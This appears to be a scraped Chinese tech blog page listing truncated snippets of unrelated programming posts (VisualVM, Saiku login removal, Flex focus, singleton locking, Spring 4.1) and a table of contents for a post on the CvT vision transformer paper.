Java VisualVM监控远程JVM JDK1.6开始自带的VisualVM就是不错的监控工具. 这个工具就在JAVA_HOME\bin\目录下的jvisualvm.exe, 双击这个文件就能看到界面通过JMX连接远程机器, 需要经过下面的配置: 1. 修改远程机器JDK配置文件 (我这里远程机器是linux).
Saiku去掉登录模块 daizj saiku 登录 olap BI
1、修改applicationContext-saiku-webapp.xml <security:intercept-url pattern="/rest/**" access="IS_AUTHENTICATED_ANONYMOUSLY" /> <security:intercept-url pattern=&qu
浅析 Flex中的Focus dsjt html Flex Flash
关键字：focus、 setFocus、 IFocusManager、KeyboardEvent 焦点、设置焦点、获得焦点、键盘事件一、无焦点的困扰——组件监听不到键盘事件原因：只有获得焦点的组件（确切说是InteractiveObject）才能监听到键盘事件的目标阶段；键盘事件（flash.events.KeyboardEvent）参与冒泡阶段，所以焦点组件的父项（以及它爸
Yii全局函数使用 dcj3sjt126com yii
由于YII致力于完美的整合第三方库，它并没有定义任何全局函数。yii中的每一个应用都需要全类别和对象范围。例如，Yii::app()->user;Yii::app()->params['name'];等等。我们可以自行设定全局函数，使得代码看起来更加简洁易用。(原文地址) 我们可以保存在globals.php在protected目录下。然后，在入口脚本index.php的，我们包括在
设计模式之单例模式二（解决无序写入的问题） come_for_dream 单例模式 volatile 乱序执行双重检验锁
在上篇文章中我们使用了双重检验锁的方式避免懒汉式单例模式下由于多线程造成的实例被多次创建的问题，但是因为由于JVM为了使得处理器内部的运算单元能充分利用，处理器可能会对输入代码进行乱序执行（Out Of Order Execute）优化，处理器会在计算之后将乱序执行的结果进行重组，保证该
程序员从初级到高级的蜕变 gcq511120594 框架工作 PHP android html5
软件开发是一个奇怪的行业，市场远远供不应求。这是一个已经存在多年的问题，而且随着时间的流逝，愈演愈烈。我们严重缺乏能够满足需求的人才。这个行业相当年轻。大多数软件项目是失败的。几乎所有的项目都会超出预算。我们解决问题的最佳指导方针可以归结为——“用一些通用方法去解决问题，当然这些方法常常不管用，于是，唯一能做的就是不断地尝试，逐个看看是否奏效”。现在我们把淫浸代码时间超过3年的开发人员称为
Reverse Linked List hcx2013 list
Reverse a singly linked list. /** * Definition for singly-linked list. * public class ListNode { * int val; * ListNode next; * ListNode(int x) { val = x; } * } */ p
Spring4.1新特性——数据库集成测试 jinnianshilongnian spring 4.1
目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
C# Ajax上传图片同时生成微缩图(附Demo) liyonghui160com
1.Ajax无刷新上传图片,详情请阅我的这篇文章。（jquery + c# ashx） 2.C#位图处理 System.Drawing。 3.最新demo支持IE7,IE8,Fir
Java list三种遍历方法性能比较 pda158 java
从c/c++语言转向java开发，学习java语言list遍历的三种方法，顺便测试各种遍历方法的性能，测试方法为在ArrayList中插入1千万条记录，然后遍历ArrayList，发现了一个奇怪的现象，测试代码例如以下： package com.hisense.tiger.list; import java.util.ArrayList; import java.util.Iterator;
300个涵盖IT各方面的免费资源（上）——商业与市场篇 shoothao seo 商业与市场 IT资源免费资源
A.网站模板+logo+服务器主机+发票生成 HTML5 UP:响应式的HTML5和CSS3网站模板。 Bootswatch:免费的Bootstrap主题。 Templated:收集了845个免费的CSS和HTML5网站模板。 Wordpress.org|Wordpress.com:可免费创建你的新网站。 Strikingly:关注领域中免费无限的移动优
localStorage、sessionStorage uule localStorage
W3School 例子 HTML5 提供了两种在客户端存储数据的新方法： localStorage - 没有时间限制的数据存储 sessionStorage - 针对一个 session 的数据存储之前，这些都是由 cookie 完成的。但是 cookie 不适合大量数据的存储，因为它们由每个对服务器的请求来传递，这使得 cookie 速度很慢而且效率也不

[Transformer]CvT:Introducing Convolutions to Vision Transformers

CvT:将卷积引入Transformer

Abstract

Section I Introduction

Section II Related Work

Section III Convolution vision Transformer

Part 1 Convolutional Token Embedding

Part 2 Convolution Projection for Attention

Part 3 Efficiency Considerations

Part 4 Methodological Discussions

Section IV Experiments

Part 1 Comparison to SOTA

Part 2 Ablation Study

Section V Conclusion

你可能感兴趣的:(CV,transformer,深度学习,计算机视觉)

CvT:将卷积引入Transformer